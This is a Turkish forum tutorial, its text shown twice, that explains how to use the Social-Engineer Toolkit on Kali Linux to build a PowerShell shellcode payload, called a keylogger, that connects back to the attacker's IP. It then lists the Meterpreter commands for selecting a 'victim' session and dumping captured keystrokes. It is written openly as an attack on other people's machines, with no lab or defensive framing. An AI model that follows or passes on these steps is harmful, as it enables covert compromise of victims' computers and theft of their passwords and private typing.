Bugün sizlerle Kali Linux işletim sistemi ile yüklü olarak gelen Social Enginenering Toolkit aracı ile Keylogger oluşturacağız.
Bugün sizlerle Kali Linux işletim sistemi ile yüklü gelen Social Enginenering Toolkit aracı ile "KEYLOGGER" oluşturmayı göstereceğim.
Arama bölümüne şu şekilde yazarak Tool'a ulaşabilirsiniz. :
Ya da kısa yoldan terminalimize "SETOOLKİT" yazarak da ulaşılabilir.
Toolumuzu çalıştırdıktan sonra karşımıza böyle bir sahne gelecek değerli arkadaşlarım.
1. Seçeneği seçeceğimizden terminalimize "1" yazıyoruz.
Ardından Karşımıza tekrardan "10" tane seçenek çıkacaktır.
Biz "9." seçeneği seçeceğimizden terminalimize "9" yazıyoruz.
Karşımıza tekrardan 4 tane seçenek gelecek ve biz "Powershell Alphanumeric Shellcode İnjector" seçeneğini seçeceğiz.
Buradan sonra bizden LHOST ve Port isteyecektir. Yeni bir terminal açacak "ifconfig" komutunu kullanarak ip adresinizi kopyalayın.
Şu şekilde isteyecektir ;
Sizden istenilen bilgileri (LHOST & Port) yazdıktan sonra "ENTER" tuşuna basınız.
Terminalinize aşağıdaki gibi yazılar gelecektir. Kırmızı ile işaretlediğim yerde keyloggerımızın kayıt olduğu yer yazmaktadır. Verilen adrese giderek göz atınız. Eğer keylogger ".txt" şeklinde kayıt edilmişse ".bat" şeklinde düzeltiniz.
Ardından Keyloggerımızı dinlemek için size seçenek sunacak. Buna "yes" demelisiniz.
Kurban Keyloggerı yedi diyelim.. Aşağıdaki komutlar ile kurbanın bilgisayarını dinleyebilirsiniz.
sessions -i : Kurban listesini gösterir.
sessions -i 1 : 1. kurbanı seçer.
sysinfo: Kurbanın sistem bilgisini gösterir.
keyscan_start : Keyloggerı aktif eder.
keyscan_dump: Keyloggerın topladığı bilgileri terminalinize çeker.
Bu konular ile ilgilenen arkadaşlarıma elimden geldiğince açık ve basit bir şekilde anlatmaya çalıştım. Siz de bana eksiklerimi söyleyerek yardım edebilirsiniz. Eğer işinize yaradıysa "teşekkür" butonuna basarak destek olabilirsiniz. Bir sonraki konuda görüşmek üzere... "-DAKE"Arama bölümüne şu şekilde yazarak Tool'a ulaşabilirsiniz. :
![JMsl8I.png](https://imgyukle.com/images/2020/04/02/JMsl8I.png)
Ya da kısa yoldan terminalimize "SETOOLKİT" yazarak da ulaşılabilir.
![JMBjl1.png](https://imgyukle.com/images/2020/04/02/JMBjl1.png)
![JMs8g1.png](https://imgyukle.com/images/2020/04/02/JMs8g1.png)
1. Seçeneği seçeceğimizden terminalimize "1" yazıyoruz.
![JMBjl1.png](https://imgyukle.com/images/2020/04/02/JMBjl1.png)
![JMsUDU.png](https://imgyukle.com/images/2020/04/02/JMsUDU.png)
Biz "9." seçeneği seçeceğimizden terminalimize "9" yazıyoruz.
![JMBjl1.png](https://imgyukle.com/images/2020/04/02/JMBjl1.png)
![JMs25o.png](https://imgyukle.com/images/2020/04/02/JMs25o.png)
Karşımıza tekrardan 4 tane seçenek gelecek ve biz "Powershell Alphanumeric Shellcode İnjector" seçeneğini seçeceğiz.
![JMBjl1.png](https://imgyukle.com/images/2020/04/02/JMBjl1.png)
Buradan sonra bizden LHOST ve Port isteyecektir. Yeni bir terminal açacak "ifconfig" komutunu kullanarak ip adresinizi kopyalayın.
Şu şekilde isteyecektir ;
![JMsK0j.png](https://imgyukle.com/images/2020/04/02/JMsK0j.png)
![JMBjl1.png](https://imgyukle.com/images/2020/04/02/JMBjl1.png)
Sizden istenilen bilgileri (LHOST & Port) yazdıktan sonra "ENTER" tuşuna basınız.
![JMBjl1.png](https://imgyukle.com/images/2020/04/02/JMBjl1.png)
Terminalinize aşağıdaki gibi yazılar gelecektir. Kırmızı ile işaretlediğim yerde keyloggerımızın kayıt olduğu yer yazmaktadır. Verilen adrese giderek göz atınız. Eğer keylogger ".txt" şeklinde kayıt edilmişse ".bat" şeklinde düzeltiniz.
![JMsWbH.png](https://imgyukle.com/images/2020/04/02/JMsWbH.png)
Ardından Keyloggerımızı dinlemek için size seçenek sunacak. Buna "yes" demelisiniz.
Kurban Keyloggerı yedi diyelim.. Aşağıdaki komutlar ile kurbanın bilgisayarını dinleyebilirsiniz.
sessions -i : Kurban listesini gösterir.
sessions -i 1 : 1. kurbanı seçer.
sysinfo: Kurbanın sistem bilgisini gösterir.
keyscan_start : Keyloggerı aktif eder.
keyscan_dump: Keyloggerın topladığı bilgileri terminalinize çeker.
![JMDG8R.jpg](https://imgyukle.com/images/2020/04/02/JMDG8R.jpg)